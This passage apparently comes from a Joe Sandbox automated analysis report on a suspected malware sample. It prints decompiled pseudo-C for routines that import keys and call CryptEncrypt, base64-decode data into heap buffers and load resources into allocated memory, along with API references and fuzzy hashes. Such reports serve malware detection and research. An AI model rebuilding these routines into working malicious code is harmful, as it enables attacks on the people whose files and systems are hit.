                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 04004A34
                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(?), ref: 04004A7D
                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 04004A8A
                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04004AA5
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Destroy$CreateDataParam$ContextDecryptDeriveRelease
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2727466597-0
                                                                                                                                                                                                                                                                          • Opcode ID: 56f7e97ff9290496e290980ffb5b481f03a5a3792702acde3772e2a43a98712a
                                                                                                                                                                                                                                                                          • Instruction ID: 825b94236ad970d67c54706e51f03fb1cf2707309f33405f466b5fd67a115f37
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56f7e97ff9290496e290980ffb5b481f03a5a3792702acde3772e2a43a98712a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E251FD71A54318ABEB65CF50CC45FEA77BCAB48B04F008598F609B61C0DB79AB84CF54
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                                                                                          			E04008970(intOrPtr _a4, intOrPtr* _a8, BYTE* _a12, int _a16) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                          				long* _v20;
                                                                                                                                                                                                                                                                          				char* _t27;
                                                                                                                                                                                                                                                                          				int _t28;
                                                                                                                                                                                                                                                                          				int _t33;
                                                                                                                                                                                                                                                                          				char* _t47;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_t27 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          					_t28 = CryptAcquireContextA( &_v12, _t27, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                          					if(_t28 == 0) {
                                                                                                                                                                                                                                                                          						_v16 = GetLastError();
                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                          							_t47 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          							CryptAcquireContextA( &_v12, _t47, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                          						if(CryptImportKey(_v12, _a12, _a16, 0, 1,  &_v20) != 0) {
                                                                                                                                                                                                                                                                          							_t33 = _v20;
                                                                                                                                                                                                                                                                          							__imp__CryptEncrypt(_t33, 0, 1, 0, _a4, _a8,  *_a8);
                                                                                                                                                                                                                                                                          							_v8 = _t33;
                                                                                                                                                                                                                                                                          							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                                                                          0x04008976
                                                                                                                                                                                                                                                                          0x04008981
                                                                                                                                                                                                                                                                          0x04008a60
                                                                                                                                                                                                                                                                          0x04008a66
                                                                                                                                                                                                                                                                          0x040089a5
                                                                                                                                                                                                                                                                          0x040089a5
                                                                                                                                                                                                                                                                          0x040089b5
                                                                                                                                                                                                                                                                          0x040089bf
                                                                                                                                                                                                                                                                          0x040089c7
                                                                                                                                                                                                                                                                          0x040089cf
                                                                                                                                                                                                                                                                          0x040089d9
                                                                                                                                                                                                                                                                          0x040089ed
                                                                                                                                                                                                                                                                          0x040089f8
                                                                                                                                                                                                                                                                          0x040089f8
                                                                                                                                                                                                                                                                          0x040089d9
                                                                                                                                                                                                                                                                          0x04008a02
                                                                                                                                                                                                                                                                          0x04008a04
                                                                                                                                                                                                                                                                          0x04008a27
                                                                                                                                                                                                                                                                          0x04008a3d
                                                                                                                                                                                                                                                                          0x04008a41
                                                                                                                                                                                                                                                                          0x04008a47
                                                                                                                                                                                                                                                                          0x04008a4e
                                                                                                                                                                                                                                                                          0x04008a4e
                                                                                                                                                                                                                                                                          0x04008a5a
                                                                                                                                                                                                                                                                          0x04008a5a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04008a02

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 040089BF
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 040089C9
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 040089F8
                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008A1F
                                                                                                                                                                                                                                                                          • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 04008A41
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04008A4E
                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008A5A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 040089B0
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 040089E8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Context$Acquire$DestroyEncryptErrorImportLastRelease
                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                          • API String ID: 3736710109-947817771
                                                                                                                                                                                                                                                                          • Opcode ID: a580c414a6f780aecf9ca1925e7721a486cca4ea517db96ead6d5debf2f75543
                                                                                                                                                                                                                                                                          • Instruction ID: 073036156a227ab269f6199982c6e62e9abf2561c3e32999b52b046b74d0c6c6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a580c414a6f780aecf9ca1925e7721a486cca4ea517db96ead6d5debf2f75543
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D231FD75A40208EFFB54DFA4C849BAE77B9FB44701F14C658F605B62C0D7B8AA80CB51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                                                                                                          			E00401000() {
                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                          				char* _v48;
                                                                                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                                                                                          				char* _v56;
                                                                                                                                                                                                                                                                          				void* _v60;
                                                                                                                                                                                                                                                                          				intOrPtr* _t18;
                                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t19;
                                                                                                                                                                                                                                                                          				intOrPtr* _t25;
                                                                                                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                                                                                                          				intOrPtr* _t31;
                                                                                                                                                                                                                                                                          				intOrPtr _t36;
                                                                                                                                                                                                                                                                          				void* _t38;
                                                                                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                                                                                          				void* _t41;
                                                                                                                                                                                                                                                                          				signed int _t42;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t18 =  *0x404088; // 0x401c60
                                                                                                                                                                                                                                                                          				if(_t18 != 0) {
                                                                                                                                                                                                                                                                          					_v52 = 0;
                                                                                                                                                                                                                                                                          					_v56 = 2;
                                                                                                                                                                                                                                                                          					_v60 = 0;
                                                                                                                                                                                                                                                                          					 *_t18();
                                                                                                                                                                                                                                                                          					_t42 = _t42 - 0xc;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v60 = E00401110; // executed
                                                                                                                                                                                                                                                                          				_t19 = SetUnhandledExceptionFilter(??); // executed
                                                                                                                                                                                                                                                                          				_push(_t19);
                                                                                                                                                                                                                                                                          				E00401DC8(E00401CE8(_t38));
                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                          				_v48 =  &_v20;
                                                                                                                                                                                                                                                                          				_v52 =  *0x403018;
                                                                                                                                                                                                                                                                          				_v56 =  &_v16;
                                                                                                                                                                                                                                                                          				_v60 = 0x405004;
                                                                                                                                                                                                                                                                          				 *_t42 = 0x405000;
                                                                                                                                                                                                                                                                          				L00402410();
                                                                                                                                                                                                                                                                          				_t25 =  *0x405038;
                                                                                                                                                                                                                                                                          				if(_t25 != 0) {
                                                                                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                                                                                          					 *0x40301c = _t25;
                                                                                                                                                                                                                                                                          					_v60 = _t25;
                                                                                                                                                                                                                                                                          					_t36 = __imp___iob;
                                                                                                                                                                                                                                                                          					 *_t42 =  *((intOrPtr*)(_t36 + 0x10));
                                                                                                                                                                                                                                                                          					L00402430();
                                                                                                                                                                                                                                                                          					_v60 =  *0x405038;
                                                                                                                                                                                                                                                                          					 *_t42 =  *((intOrPtr*)(_t36 + 0x30));
                                                                                                                                                                                                                                                                          					L00402430();
                                                                                                                                                                                                                                                                          					_v60 =  *0x405038;
                                                                                                                                                                                                                                                                          					_t25 =  *((intOrPtr*)(_t36 + 0x50));
                                                                                                                                                                                                                                                                          					 *_t42 = _t25;
                                                                                                                                                                                                                                                                          					L00402430();
                                                                                                                                                                                                                                                                          					goto L3;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                                                                                          					L00402418();
                                                                                                                                                                                                                                                                          					 *_t25 =  *0x40301c;
                                                                                                                                                                                                                                                                          					_t30 = E00401F00(_t36, _t40, _t41);
                                                                                                                                                                                                                                                                          					_t42 = _t42 & 0xfffffff0;
                                                                                                                                                                                                                                                                          					_t31 = E00402148(_t30);
                                                                                                                                                                                                                                                                          					L00402420();
                                                                                                                                                                                                                                                                          					_v56 =  *_t31;
                                                                                                                                                                                                                                                                          					_v60 =  *0x405004;
                                                                                                                                                                                                                                                                          					 *_t42 =  *0x405000; // executed
                                                                                                                                                                                                                                                                          					_t25 = E0040216C( *0x40301c); // executed
                                                                                                                                                                                                                                                                          					L00402428();
                                                                                                                                                                                                                                                                          					 *_t42 = _t25;
                                                                                                                                                                                                                                                                          					ExitProcess(??);
                                                                                                                                                                                                                                                                          					goto L4;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                          0x00401007
                                                                                                                                                                                                                                                                          0x0040100e
                                                                                                                                                                                                                                                                          0x00401010
                                                                                                                                                                                                                                                                          0x00401018
                                                                                                                                                                                                                                                                          0x00401020
                                                                                                                                                                                                                                                                          0x00401027
                                                                                                                                                                                                                                                                          0x00401029
                                                                                                                                                                                                                                                                          0x00401029
                                                                                                                                                                                                                                                                          0x0040102c
                                                                                                                                                                                                                                                                          0x00401033
                                                                                                                                                                                                                                                                          0x00401038
                                                                                                                                                                                                                                                                          0x0040103e
                                                                                                                                                                                                                                                                          0x00401043
                                                                                                                                                                                                                                                                          0x0040104d
                                                                                                                                                                                                                                                                          0x00401056
                                                                                                                                                                                                                                                                          0x0040105d
                                                                                                                                                                                                                                                                          0x00401061
                                                                                                                                                                                                                                                                          0x00401069
                                                                                                                                                                                                                                                                          0x00401070
                                                                                                                                                                                                                                                                          0x00401075
                                                                                                                                                                                                                                                                          0x0040107c
                                                                                                                                                                                                                                                                          0x004010c8
                                                                                                                                                                                                                                                                          0x004010c8
                                                                                                                                                                                                                                                                          0x004010cd
                                                                                                                                                                                                                                                                          0x004010d1
                                                                                                                                                                                                                                                                          0x004010da
                                                                                                                                                                                                                                                                          0x004010dd
                                                                                                                                                                                                                                                                          0x004010e7
                                                                                                                                                                                                                                                                          0x004010ee
                                                                                                                                                                                                                                                                          0x004010f1
                                                                                                                                                                                                                                                                          0x004010fb
                                                                                                                                                                                                                                                                          0x004010ff
                                                                                                                                                                                                                                                                          0x00401102
                                                                                                                                                                                                                                                                          0x00401105
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0040107e
                                                                                                                                                                                                                                                                          0x0040107e
                                                                                                                                                                                                                                                                          0x0040107e
                                                                                                                                                                                                                                                                          0x00401089
                                                                                                                                                                                                                                                                          0x0040108b
                                                                                                                                                                                                                                                                          0x00401090
                                                                                                                                                                                                                                                                          0x00401093
                                                                                                                                                                                                                                                                          0x00401098
                                                                                                                                                                                                                                                                          0x0040109f
                                                                                                                                                                                                                                                                          0x004010a8
                                                                                                                                                                                                                                                                          0x004010b1
                                                                                                                                                                                                                                                                          0x004010b4
                                                                                                                                                                                                                                                                          0x004010bb
                                                                                                                                                                                                                                                                          0x004010c0
                                                                                                                                                                                                                                                                          0x004010c3
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004010c3

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.558886062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558685401.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558979025.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559069325.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559239825.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559886186.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3695137517-0
                                                                                                                                                                                                                                                                          • Opcode ID: c06788a4494e1d2675dd5dd0aa7ee8a04c7ee4f1323cc2b481735e636d9d2198
                                                                                                                                                                                                                                                                          • Instruction ID: 5314c48efd062ef50f6f18183d7c37668516cd49ce0ee3545be6121dab1d6748
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c06788a4494e1d2675dd5dd0aa7ee8a04c7ee4f1323cc2b481735e636d9d2198
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A21E8B45057009FC700EF79D68961EBBE4BF44308F40983EE984A7395D778D8449F5A
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04001390(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                          				signed char* _v8;
                                                                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                                                                                                          				long _v32;
                                                                                                                                                                                                                                                                          				signed int _t52;
                                                                                                                                                                                                                                                                          				signed int _t57;
                                                                                                                                                                                                                                                                          				intOrPtr _t64;
                                                                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                                                          				void* _t107;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t52 = __eax;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a4 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                          					return _t52 | 0xffffffff;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v24 = 0;
                                                                                                                                                                                                                                                                          					_t57 = RtlAllocateHeap(GetProcessHeap(), 8, _a8 + 5); // executed
                                                                                                                                                                                                                                                                          					_v28 = _t57;
                                                                                                                                                                                                                                                                          					if(_v28 != 0) {
                                                                                                                                                                                                                                                                          						E04007B70(_v28, _a4, _a8);
                                                                                                                                                                                                                                                                          						E04007B70(_v28 + _a8, "====", 4);
                                                                                                                                                                                                                                                                          						_t106 = _t104 + 0x18;
                                                                                                                                                                                                                                                                          						_v8 = _v28;
                                                                                                                                                                                                                                                                          						_v20 = 3;
                                                                                                                                                                                                                                                                          						while(_v20 == 3) {
                                                                                                                                                                                                                                                                          							_v32 = 0;
                                                                                                                                                                                                                                                                          							while(_v32 < 4) {
                                                                                                                                                                                                                                                                          								while( *_v8 != 0x3d) {
                                                                                                                                                                                                                                                                          									_t76 = E04001500( *_v8 & 0x000000ff);
                                                                                                                                                                                                                                                                          									_t106 = _t106 + 4;
                                                                                                                                                                                                                                                                          									if(_t76 >= 0) {
                                                                                                                                                                                                                                                                          										break;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									_v8 =  &(_v8[1]);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								 *((char*)(_t103 + _v32 - 0xc)) =  *_v8;
                                                                                                                                                                                                                                                                          								_v8 =  &(_v8[1]);
                                                                                                                                                                                                                                                                          								_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_t64 = E04001580( &_v16,  &_v12);
                                                                                                                                                                                                                                                                          							_t107 = _t106 + 8;
                                                                                                                                                                                                                                                                          							_v20 = _t64;
                                                                                                                                                                                                                                                                          							if(_a16 >= _v20) {
                                                                                                                                                                                                                                                                          								E04007B70(_a12,  &_v12, _v20);
                                                                                                                                                                                                                                                                          								_t106 = _t107 + 0xc;
                                                                                                                                                                                                                                                                          								_a12 = _a12 + _v20;
                                                                                                                                                                                                                                                                          								_a16 = _a16 - _v20;
                                                                                                                                                                                                                                                                          								_v24 = _v24 + _v20;
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							return HeapFree(GetProcessHeap(), 0, _v28) | 0xffffffff;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						RtlFreeHeap(GetProcessHeap(), 0, _v28); // executed
                                                                                                                                                                                                                                                                          						return _v24;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					return _t57 | 0xffffffff;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}


















                                                                                                                                                                                                                                                                          0x04001390
                                                                                                                                                                                                                                                                          0x0400139a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040013b6
                                                                                                                                                                                                                                                                          0x040013b6
                                                                                                                                                                                                                                                                          0x040013cd
                                                                                                                                                                                                                                                                          0x040013d3
                                                                                                                                                                                                                                                                          0x040013da
                                                                                                                                                                                                                                                                          0x040013f0
                                                                                                                                                                                                                                                                          0x04001406
                                                                                                                                                                                                                                                                          0x0400140b
                                                                                                                                                                                                                                                                          0x04001411
                                                                                                                                                                                                                                                                          0x04001414
                                                                                                                                                                                                                                                                          0x0400141b
                                                                                                                                                                                                                                                                          0x04001425
                                                                                                                                                                                                                                                                          0x04001437
                                                                                                                                                                                                                                                                          0x0400143d
                                                                                                                                                                                                                                                                          0x0400144f
                                                                                                                                                                                                                                                                          0x04001454
                                                                                                                                                                                                                                                                          0x04001459
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001461
                                                                                                                                                                                                                                                                          0x04001461
                                                                                                                                                                                                                                                                          0x0400146e
                                                                                                                                                                                                                                                                          0x04001478
                                                                                                                                                                                                                                                                          0x04001434
                                                                                                                                                                                                                                                                          0x04001434
                                                                                                                                                                                                                                                                          0x04001485
                                                                                                                                                                                                                                                                          0x0400148a
                                                                                                                                                                                                                                                                          0x0400148d
                                                                                                                                                                                                                                                                          0x04001496
                                                                                                                                                                                                                                                                          0x040014bc
                                                                                                                                                                                                                                                                          0x040014c1
                                                                                                                                                                                                                                                                          0x040014ca
                                                                                                                                                                                                                                                                          0x040014d3
                                                                                                                                                                                                                                                                          0x040014dc
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040014dc
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040014ab
                                                                                                                                                                                                                                                                          0x040014f1
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040014f7
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040013dc

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000005), ref: 040013C6
                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 040013CD
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0400149E
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 040014A5
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 040014EA
                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 040014F1
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$Process$Free$Allocate
                                                                                                                                                                                                                                                                          • String ID: ====
                                                                                                                                                                                                                                                                          • API String ID: 168621272-1026985228
                                                                                                                                                                                                                                                                          • Opcode ID: cc6d638cfefe3820553d32bbcecc0cddb825681ad85667f70979d716b4f01239
                                                                                                                                                                                                                                                                          • Instruction ID: c6e28297ba35799b7f22f7dab3aca0fae7ec72587fc4187f79a8e8c8e7655232
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc6d638cfefe3820553d32bbcecc0cddb825681ad85667f70979d716b4f01239
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7414CB5D04209EBEB04DFA4C884BEE7BB5FF44309F108619E515BB2D0D735AA45CB92
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.558886062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558685401.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558979025.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559069325.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559239825.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559886186.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AccessAllocateFindMemoryResourceResource_Virtual
                                                                                                                                                                                                                                                                          • String ID: $@@$@$BWONAD
                                                                                                                                                                                                                                                                          • API String ID: 2485490239-207724474
                                                                                                                                                                                                                                                                          • Opcode ID: 1e933e0ed077e168773f665c03ba50cbef35de6cb0efad7f213f85bcee16254c
                                                                                                                                                                                                                                                                          • Instruction ID: 811c5ae7d21e0ee4240d1f8525f1dfe1deae8c0cebef189c32f944b86f782d2c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e933e0ed077e168773f665c03ba50cbef35de6cb0efad7f213f85bcee16254c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1631D2B4D042099FDB00DFA9C4407DEBBF4EB49314F10C5AAD958B7340D7789A488FA5
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                                                                                          			E04009F70(intOrPtr _a4, signed int _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				intOrPtr* _v28;
                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                          				intOrPtr* _t59;
                                                                                                                                                                                                                                                                          				intOrPtr _t64;
                                                                                                                                                                                                                                                                          				void* _t99;
                                                                                                                                                                                                                                                                          				void* _t100;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                          					_t103 = _a8 - 5;
                                                                                                                                                                                                                                                                          					if(_a8 > 5) {
                                                                                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                                                                                          						_t59 = E040097A0( ~(0 | _t103 > 0x00000000) | _a8 / 0x00000006 * 0x00000288); // executed
                                                                                                                                                                                                                                                                          						_t100 = _t99 + 4;
                                                                                                                                                                                                                                                                          						_v28 = _t59;
                                                                                                                                                                                                                                                                          						_v12 = _v28;
                                                                                                                                                                                                                                                                          						if(_v12 != 0) {
                                                                                                                                                                                                                                                                          							_v16 = _v12;
